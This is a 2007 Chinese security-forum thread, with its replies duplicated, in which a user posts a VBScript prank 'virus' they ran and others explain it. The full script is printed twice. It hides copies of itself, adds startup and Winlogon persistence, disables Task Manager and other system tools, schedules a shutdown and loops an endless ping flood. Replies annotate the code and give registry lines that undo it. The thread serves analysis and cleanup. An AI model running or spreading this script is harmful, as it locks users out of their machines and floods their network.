[讨论]一段疑是病毒的程序-付费问答-看雪-安全社区|安全招聘|kanxue.com

[旧帖] [讨论]一段疑是病毒的程序 0.00雪花

发表于: 2007-9-29 18:28 4524

[旧帖] [讨论]一段疑是病毒的程序 0.00雪花

unknown

2007-9-29 18:28

4524

昨天在QQ编程吧浏览帖子无意中见到下面一段程序楼主说是唬菜鸟的病毒（将其放进文档修改TXT后缀为vbs ）出于好奇的心理我尝试了一下不停的复制而且禁用任务管理器
只好重新启动今天发现很多网页上不去了例如百度 www.qbq.cn 请高手分析一下这段程序我的情况跟它有关系么！

Set objFS = CreateObject("Scripting.FileSystemObject")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set wsh=wscript.createobject("wscript.shell")
set reg=wscript.createobject("wscript.shell")
dim wsh
a=WScript.ScriptFullName
b="shutdown -t 600 -s -c 如果你是菜鸟的话。。。我想你知道害怕了吧！嬉嬉！"
c="c:\svchost.vbs"
d="d:\svchost.vbs"
s="c:\windows\system32\svchost.vbs"
c1="attrib +s +h +a +r c:\svchost.vbs"
d1="attrib +s +h +a +r d:\svchost.vbs"
s1="attrib +s +h +a +r c:\windows\system32\svchost.vbs"
If objFSO.FileExists (c) Then
Else
objFs.GetFile (a).Copy (c)
wsh.run c1
End If
If objFSO.FileExists(d) Then
Else
objFs.GetFile (a).Copy (d)
wsh.run d1
End If
If objFSO.FileExists(s) Then
Else
objFs.GetFile (a).Copy (s)
wsh.run s1
End If
wsh.run b
wsh.run "narrator"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000100","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","c:\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","d:\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","tttt H:mm:ss","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","笨蛋！","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","傻逼！","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","c:\windows\system32\svchost.vbs","REG_SZ"
msgbox "系统快要崩溃了！",48,"由于你经常看黄页："
msgbox "windows崩溃了！",18,"安全警报："
do
wsh.run ("ping -t -l 6500 192.168.1.1")
loop

[课程]FART 脱壳王！加量不加价！FART作者讲授！

收藏・0

免费・0

支持

最新回复 (7)
JJJC 雪币： 141 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 310 粉丝 0 关注私信	JJJC 2 楼 Set objFS = CreateObject("Scripting.FileSystemObject") Set objFSO = CreateObject("Scripting.FileSystemObject") set wsh=wscript.createobject("wscript.shell") set reg=wscript.createobject("wscript.shell") 声明函数 dim wsh a=WScript.ScriptFullName b="shutdown -t 600 -s -c 如果你是菜鸟的话。。。我想你知道害怕了吧！嬉嬉！" c="c:\svchost.vbs" d="d:\svchost.vbs" s="c:\windows\system32\svchost.vbs" 定义变量 c1="attrib +s +h +a +r c:\svchost.vbs" d1="attrib +s +h +a +r d:\svchost.vbs" s1="attrib +s +h +a +r c:\windows\system32\svchost.vbs" 给文件加隐藏、系统、存档、只读属性 If objFSO.FileExists (c) Then Else objFs.GetFile (a).Copy (c) wsh.run c1 End If If objFSO.FileExists(d) Then Else objFs.GetFile (a).Copy (d) wsh.run d1 End If If objFSO.FileExists(s) Then Else objFs.GetFile (a).Copy (s) 文件复制 wsh.run s1 End If wsh.run b wsh.run "narrator" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD" 关闭注册表编辑器（可能） reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000001","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000001","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000001","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000001","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000100","REG_DWORD" 隐藏注销...晕 reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","c:\svchost.vbs","REG_SZ" reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","d:\svchost.vbs","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ" reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ" 自动运行 reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","tttt H:mm:ss","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","笨蛋！","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","傻逼！","REG_SZ" 在时间日期前加“傻逼”... reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","c:\windows\system32\svchost.vbs","REG_SZ" 自动运行 msgbox "系统快要崩溃了！",48,"由于你经常看黄页：" msgbox "windows崩溃了！",18,"安全警报：" 对话框 do wsh.run ("ping -t -l 6500 192.168.1.1") 经典的ping风暴vbs版 loop 2007-9-29 19:07 0
JJJC 雪币： 141 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 310 粉丝 0 关注私信	JJJC 3 楼好像涉及网络的只有 wsh.run ("ping -t -l 6500 192.168.1.1") 可能是这句。 2007-9-29 19:12 0
JJJC 雪币： 141 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 310 粉丝 0 关注私信	JJJC 4 楼 reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","","REG_SZ" reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost"","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","","REG_SZ" reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","","REG_SZ" reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","","REG_SZ" 试试看 2007-9-29 19:15 0
unknown 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 7 粉丝 0 关注私信	unknown 5 楼谢谢你兄弟我电脑装了一个RETURNIL软件类似影子系统和联想的冰封系统应该不会是注册表的问题可是为什么百度和一些网站就是上不去呢？还有他用的这是什么语言？再次感谢你的细心回复 2007-9-29 19:28 0
whtyy 雪币： 242 活跃值： (14) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 356 粉丝 0 关注私信	whtyy 1 6 楼弱智的小毛孩子写的东西无聊 2007-9-29 23:10 0
大菜一号雪币： 424 活跃值： (10) 能力值： ( LV9，RANK：850 ) 在线值：发帖 58 回帖 1536 粉丝 0 关注私信	大菜一号 21 7 楼路过```无聊看这句就知道怎么回事 “如果你是菜鸟的话。。。我想你知道害怕了吧！嬉嬉！” 2007-9-30 07:48 0
JJJC 雪币： 141 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 310 粉丝 0 关注私信	JJJC 8 楼无法上网代码经:wsh.run ("ping -t -l 6500 192.168.1.1") (虚拟机验证)2M的带宽瞬间为0 编写语言：vbs 2007-9-30 09:25 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

unknown

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (7)
JJJC 雪币： 141 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 310 粉丝 0 关注私信	JJJC 2 楼 Set objFS = CreateObject("Scripting.FileSystemObject") Set objFSO = CreateObject("Scripting.FileSystemObject") set wsh=wscript.createobject("wscript.shell") set reg=wscript.createobject("wscript.shell") 声明函数 dim wsh a=WScript.ScriptFullName b="shutdown -t 600 -s -c 如果你是菜鸟的话。。。我想你知道害怕了吧！嬉嬉！" c="c:\svchost.vbs" d="d:\svchost.vbs" s="c:\windows\system32\svchost.vbs" 定义变量 c1="attrib +s +h +a +r c:\svchost.vbs" d1="attrib +s +h +a +r d:\svchost.vbs" s1="attrib +s +h +a +r c:\windows\system32\svchost.vbs" 给文件加隐藏、系统、存档、只读属性 If objFSO.FileExists (c) Then Else objFs.GetFile (a).Copy (c) wsh.run c1 End If If objFSO.FileExists(d) Then Else objFs.GetFile (a).Copy (d) wsh.run d1 End If If objFSO.FileExists(s) Then Else objFs.GetFile (a).Copy (s) 文件复制 wsh.run s1 End If wsh.run b wsh.run "narrator" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD" 关闭注册表编辑器（可能） reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000001","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000001","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000001","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000001","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000100","REG_DWORD" 隐藏注销...晕 reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","c:\svchost.vbs","REG_SZ" reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","d:\svchost.vbs","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ" reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ" 自动运行 reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","tttt H:mm:ss","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","笨蛋！","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","傻逼！","REG_SZ" 在时间日期前加“傻逼”... reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","c:\windows\system32\svchost.vbs","REG_SZ" 自动运行 msgbox "系统快要崩溃了！",48,"由于你经常看黄页：" msgbox "windows崩溃了！",18,"安全警报：" 对话框 do wsh.run ("ping -t -l 6500 192.168.1.1") 经典的ping风暴vbs版 loop 2007-9-29 19:07 0
JJJC 雪币： 141 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 310 粉丝 0 关注私信	JJJC 3 楼好像涉及网络的只有 wsh.run ("ping -t -l 6500 192.168.1.1") 可能是这句。 2007-9-29 19:12 0
JJJC 雪币： 141 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 310 粉丝 0 关注私信	JJJC 4 楼 reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000000","REG_DWORD" reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","","REG_SZ" reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost"","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","","REG_SZ" reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","","REG_SZ" reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","","REG_SZ" reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","","REG_SZ" 试试看 2007-9-29 19:15 0
unknown 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 7 粉丝 0 关注私信	unknown 5 楼谢谢你兄弟我电脑装了一个RETURNIL软件类似影子系统和联想的冰封系统应该不会是注册表的问题可是为什么百度和一些网站就是上不去呢？还有他用的这是什么语言？再次感谢你的细心回复 2007-9-29 19:28 0
whtyy 雪币： 242 活跃值： (14) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 356 粉丝 0 关注私信	whtyy 1 6 楼弱智的小毛孩子写的东西无聊 2007-9-29 23:10 0
大菜一号雪币： 424 活跃值： (10) 能力值： ( LV9，RANK：850 ) 在线值：发帖 58 回帖 1536 粉丝 0 关注私信	大菜一号 21 7 楼路过```无聊看这句就知道怎么回事 “如果你是菜鸟的话。。。我想你知道害怕了吧！嬉嬉！” 2007-9-30 07:48 0
JJJC 雪币： 141 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 310 粉丝 0 关注私信	JJJC 8 楼无法上网代码经:wsh.run ("ping -t -l 6500 192.168.1.1") (虚拟机验证)2M的带宽瞬间为0 编写语言：vbs 2007-9-30 09:25 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复